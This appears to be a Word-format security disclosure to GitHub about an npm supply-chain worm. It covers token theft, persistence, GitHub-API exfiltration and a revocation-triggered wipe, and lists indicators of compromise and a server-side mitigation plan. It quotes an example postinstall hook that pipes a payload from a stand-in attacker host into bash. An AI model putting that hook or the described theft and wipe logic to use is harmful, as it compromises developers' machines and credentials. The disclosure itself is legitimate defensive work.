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b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Security Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Shai-Hulud Supply Chain Worm — Threat Analysis &amp; Coordinated Mitigation Proposal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security@github.com / GitHub Trust &amp; Safety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Subject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Supply Chain Worm: 'Shai-Hulud' — Coordinated Mitigation Proposal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 — Active Supply Chain Attack with Destructive Deadman Switch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Reporter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Name / Handle]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2026-05-13</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Attachments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shaihuld-remediate.sh (local IR script, no credential exfiltration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report discloses an active supply chain attack, internally designated 'Shai-Hulud' (also observed as 'Carnage APT'), delivered via malicious npm package lifecycle scripts. The worm steals GitHub personal access tokens, establishes OS-level persistence, exfiltrates developer data using the GitHub API as its command-and-control channel, and contains a destructive deadman switch that triggers if the stolen token is revoked through normal means.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Standard token revocation is unsafe for victims because revocation causes the polling daemon to receive a 401 Unauthorized response, which triggers deletion of the victim's SSH keys, local files, or other destructive payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This report proposes a coordinated mitigation strategy — the 'Zombie Token' protocol — that allows GitHub Trust &amp; Safety to neutralize the threat server-side before alerting victims, avoiding the deadman switch entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The malware is delivered via a malicious npm package that executes during install (postinstall or preinstall lifecycle hook). No user interaction beyond npm install is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"scripts": { "postinstall": "curl -s https://attacker.tld/payload.sh | bash" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Persistence Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On macOS, a LaunchAgent plist is written to persist across reboots:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Library/LaunchAgents/com.user.gh-token-monitor.plist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On Linux, a systemd user service is registered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/systemd/user/gh-token-monitor.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The malware binary drops to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.local/bin/gh-token-monitor.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Token Theft &amp; C2 Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The worm harvests GitHub tokens from common locations (~/.config/gh/, ~/.gitconfig, environment variables) and stores them locally at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/gh-token-monitor/token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Stolen tokens and victim data are committed to attacker-controlled repositories using the GitHub REST API. The attacker locates these repositories using the GitHub Global Search API, indexed by a unique beacon string embedded in every commit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. The Deadman Switch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A polling loop runs continuously, calling api.github.com/user with the stolen token. The daemon checks the HTTP status code with the pattern:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if [[ "$HTTP_CODE" =~ ^40[0-9]$ ]]; then</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Any 4xx response — including the 401 returned by standard token revocation — triggers the destructive handler stored at:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">~/.config/gh-token-monitor/handler</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This handler may delete SSH keys, wipe working directories, or execute arbitrary attacker-defined commands. This makes standard revocation actively harmful to victims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicators of Compromise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Indicator</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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">gh-token-monitor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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Process / binary name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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Drops to ~/.local/bin/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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">com.user.gh-token-monitor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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LaunchAgent label (macOS)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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Persists via ~/Library/LaunchAgents/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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">gh-token-monitor.service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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Systemd unit (Linux)</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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Persists via ~/.config/systemd/user/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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">~/.config/gh-token-monitor/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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Config directory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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Stores stolen token + handler payload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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">IfYouRevokeThisTokenItWillWipeTheComputerOfTheOwner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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Search beacon string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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Committed to GitHub repos; indexed via Search API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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">api.github.com/user (polling)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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 heartbeat pattern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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4xx response triggers destructive handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Proposed Coordinated Mitigation: The Zombie Token Protocol</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following four-phase approach allows GitHub to neutralize the threat without triggering the deadman switch. This mirrors established tarpitting and sinkholing techniques used in enterprise incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 1 — Zombie Token Containment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead of revoking the compromised token immediately, GitHub routes traffic from that specific token into a contained state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Calls to api.github.com/user continue to return HTTP 200 with synthetic dummy data. The deadman switch remains dormant because the polling daemon sees a valid response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All other API privileges are silently dropped. Write operations (repo creation, pushes, gist writes) return spoofed 2xx responses but payloads are discarded — or requests are rate-limited to a halt without triggering 4xx codes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker cannot exfiltrate further data, but the victim's machine is not yet endangered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2 — Out-of-Band Victim Notification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the token is safely contained, GitHub sends a high-priority security email to the address associated with the compromised account. The email:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explains the situation in plain language without technical jargon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provides exact shell commands to stop and remove the LaunchAgent (macOS) or systemd service (Linux).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Links to or includes the open-source remediation script (shaihuld-remediate.sh, attached to this report) which handles detection, defusal, immunization, and local IR reporting in one step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contains a unique one-time safe-revocation URL the victim must not click until cleanup is confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3 — Confirmed Safe Revocation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attached remediation script supports a --revoke-endpoint flag. When the victim runs the script with the one-time URL provided in the email, the script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirms the daemon is gone (process check + persistence path check).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends a clean-status signal to the endpoint — containing only host ID, OS, timestamp, and a boolean threat_was_present flag. No credentials are transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub's backend receives this confirmation and officially terminates the zombie token. Because the daemon is already removed, the resulting 401 is never received by any malicious process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A guided UI dashboard (available separately) enforces this order for less technical users: the revocation button is locked until the defusal phase confirms clean.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 — Search API Sinkholing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub can sever the attacker's C2 routing entirely by implementing a global content filter that prevents commits containing the beacon string from appearing in Search API results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
